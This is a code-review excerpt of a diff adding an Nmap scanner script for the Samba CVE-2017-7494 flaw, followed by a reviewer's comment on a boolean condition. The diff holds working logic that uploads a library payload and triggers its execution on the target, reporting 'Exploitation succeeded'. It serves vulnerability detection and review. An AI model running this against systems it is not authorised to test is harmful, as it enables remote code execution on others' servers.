scripts/smb-vuln-cve-2017-7494.nse

```diff
@@ -0,0 +1,511 @@
+    -- loop through all common candidate paths
+    for i = 1, #candidates, 1 do
+      local path = candidates[i] .. l_filename
+      local pipe_formats = {"\\\\PIPE\\".. path , path}
+      -- test both pipe formats for each path
+      for j = 1, #pipe_formats, 1 do
+        local curr_path = pipe_formats[j]
+        -- make an simple SMB connection to IPC$
+        local status, smbstate = smb.start_ex(host, true, true, "\\\\" ..
+          host.ip .. "\\IPC$", nil, nil, nil)
+        if not status then
+          stdnse.debug1("Could not connect to IPC$")
+        else
+          local overrides = {}
+          -- perform NT Create NX Request on candidate file paths
+          overrides['file_create_disposition'] = 0x1    -- FILE_OPEN
+          overrides['file_create_security_flags'] = 0x0 -- No dynamic tracking, no security context
+
+          stdnse.debug1("Trying path : %s", curr_path)
+          status, result = smb.create_file(smbstate, curr_path, overrides)
+          stdnse.debug1("Status: %s, Result: %s", status, result)
+          -- on payload execution, result will be false and server will disconnect
+          if not status and string.match(result, "SMB: ERROR: Server disconnected the connection") then
+            samba_cve.state = vulns.STATE.VULN
+            table.insert(samba_cve.check_results,
+              "Exploitation of CVE-2017-7494 succeeded!")
+            return
+          end
+        end
+      end
+    end
+  end
+  if samba_cve.state ~= vulns.STATE.VULN and not path then
+    samba_cve.state = vulns.STATE.LIKELY_VULN
+    table.insert(samba_cve.check_results,
+      'File written to remote share, but unable to execute payload either due to unknown actual path, or the system may be patched.')
+  end
+end
+
+action = function(host,port)
+  local port = nmap.get_port_state(host,{number=smb.get_port(host),protocol='tcp'})
+
+  local result, stats
+  local response = {}
+
+  local samba_cve  = {
+    title = "SAMBA Remote Code Execution from Writable Share",
+    IDS = {CVE = 'CVE-2017-7494'},
+    risk_factor = "HIGH",
+    scores = {
+      CVSSv3 = "7.5 (HIGH) (CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H)"
+    },
+    description = [[
+All versions of Samba from 3.5.0 onwards are vulnerable to a remote
+code execution vulnerability, allowing a malicious client to upload a
+shared library to a writable share, and then cause the server to load
+and execute it.
+]],
+    references = {
+      'https://www.samba.org/samba/security/CVE-2017-7494.html',
+    },
+    dates = {
+      disclosure = {year = '2017', month = '05', day = '24'},
+    },
+    check_results = {},
+    extra_info = {}
+  }
+
+  local report = vulns.Report:new(SCRIPT_NAME, host, port)
+  samba_cve.state = vulns.STATE.NOT_VULN
+
+  local check_version = stdnse.get_script_args(SCRIPT_NAME .. ".check-version") or false
+  -- check if they put false or similar
+  if check_version and string.lower(check_version) == "false" then
```

Comment:
I'm not sure I understand the reason for the first condition here. Maybe you meant `if not check_version or string.lower(check_version) == "false"`?